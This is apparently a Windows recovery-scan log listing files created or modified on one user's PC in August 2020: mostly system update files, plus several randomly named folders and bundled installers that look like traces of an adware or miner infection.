2020-08-29 17:52 - 2020-08-29 17:54 - 000000000 ____D C:\Users\Milan\AppData\Local\ScrSnap
2020-08-29 17:51 - 2020-08-29 17:54 - 000000000 ____D C:\Users\Milan\AppData\Roaming\npy4omvvn5m
2020-08-29 17:50 - 2020-08-29 22:44 - 000000000 ____D C:\Users\Milan\AppData\Roaming\0246cded558e
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\Lavasoft
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Local\Lavasoft
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-08-29 17:31 - 2020-08-29 17:31 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2020-08-29 17:30 - 2020-08-29 22:42 - 000000000 ____D C:\Program Files (x86)\MachinerData
2020-08-29 17:30 - 2020-08-29 22:41 - 000000000 ___HD C:\WINDOWS\rss
2020-08-29 17:30 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\oudvj15abkf
2020-08-29 17:30 - 2020-08-29 17:30 - 000000000 ____D C:\ProgramData\Lavasoft
2020-08-29 17:29 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\oizjd
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Direct WAV MP3 Splitter
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\Program Files (x86)\Direct WAV MP3 Splitter
2020-08-29 17:29 - 2020-08-29 17:34 - 000000000 ____D C:\Program Files (x86)\Convertilla
2020-08-29 17:29 - 2020-08-29 17:29 - 000000000 ____D C:\Program Files (x86)\DiskFixer
2020-08-27 23:00 - 2020-08-28 00:46 - 1959706735 _____ C:\Users\Milan\Downloads\Zeme.a.krev-Earth.and.Blood.2020.1080p.WEB.x264.DDP5.1.CZ.TITULKY-FCKR.mkv
2020-08-27 10:12 - 2020-08-27 11:16 - 1141266433 _____ C:\Users\Milan\Downloads\Ghosts.Of.War.2020.titl.ve filmu-kirikos1.mp4
2020-08-26 23:01 - 2020-08-29 16:26 - 000000000 ____D C:\Users\Milan\Desktop\Tanky
2020-08-24 09:09 - 2020-08-15 18:12 - 045761304 _____ C:\Users\Milan\Downloads\Maly_Modelarz_2005-04-06_-_Bismarck.rar
2020-08-15 17:41 - 2020-08-15 17:41 - 000000000 ____D C:\Users\Milan\Desktop\OH-13
2020-08-15 17:32 - 2020-08-15 17:32 - 006094091 _____ C:\Users\Milan\Downloads\Hrad Rokštejn.pdf
2020-08-15 08:34 - 2020-08-15 08:34 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-08-15 08:34 - 2020-08-10 10:38 - 000436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
2020-08-15 08:34 - 2020-08-10 10:37 - 000905528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-08-15 08:06 - 2020-08-15 08:06 - 002510856 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 025444352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 019852288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 019812352 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 018032128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 007758848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 007270912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 006294528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 005904896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 005013504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004859904 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004611072 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004129408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003822592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003637760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003516416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 002950808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2020-08-12 19:45 - 2020-08-12 19:45 - 002588688 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVDECOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002422384 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVCORE.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002259192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVDECOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002138280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVCORE.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 001870200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001836160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001610240 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001418832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001151816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001012792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000941568 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000893952 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000843776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000738064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000724480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000705536 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000692224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000669184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000666280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\WalletService.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000359496 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP4SDECD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000353792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000343408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP4SDECD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000338944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000330240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnphost.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000309248 _____ (Microsoft Corporation) C:\WINDOWS\system32\tapisrv.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tapisrv.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrahc.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\net1.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdSSDP.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iemigplugin.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\udhisapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnpcont.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msisip.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msisip.dll
2020-08-12 19:44 - 2020-08-12 19:45 - 022642688 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 025903104 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 017792512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 014820352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 009932088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 007915864 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007850784 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007604584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007583272 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007297536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007270728 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006526448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006436864 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006074552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005946368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005849872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005767224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005283776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005111296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005003824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 004625184 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 004565248 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 004227116 _____ C:\WINDOWS\system32\DefaultHrtfs.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 004005376 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003974376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 003806208 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003743056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003727872 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 003712000 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003581240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 003368616 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003141632 _____ (Microsoft Corporation) C:\WINDOWS\system32\directml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003084800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002986808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002808832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002799104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002766952 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2020-08-12 19:44 - 2020-08-12 19:44 - 002739200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002737664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002717696 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002698048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002583496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002576896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002552120 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002523136 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002471936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002307584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002289152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002260312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002136064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002096128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002085632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002022400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001942528 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001885184 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001756592 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001751040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001743680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001740800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001697792 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001672544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001669344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001665024 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001660536 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001654312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001612800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001512848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001482568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001420320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001406464 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001397576 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001393960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001366144 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001338368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001319936 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001282872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001274128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001215488 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdclt.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001197056 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdengin2.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001182248 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001182208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001149712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001127424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001123344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001101312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001077048 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001072128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001059328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001055232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001015296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001009664 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001008128 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000995840 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000963072 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000937984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000917800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000914432 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000897648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000894032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000888352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000875520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000875424 _____ (Microsoft Corporation) C:\WINDOWS\system32\pkeyhelper.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000874296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000867840 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000843776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Language.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000823744 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000822800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000783480 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000782336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000775480 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000718336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.FileExplorer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000716312 _____ (Microsoft Corporation) C:\WINDOWS\system32\StateRepository.Core.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000702976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BTAGService.dll
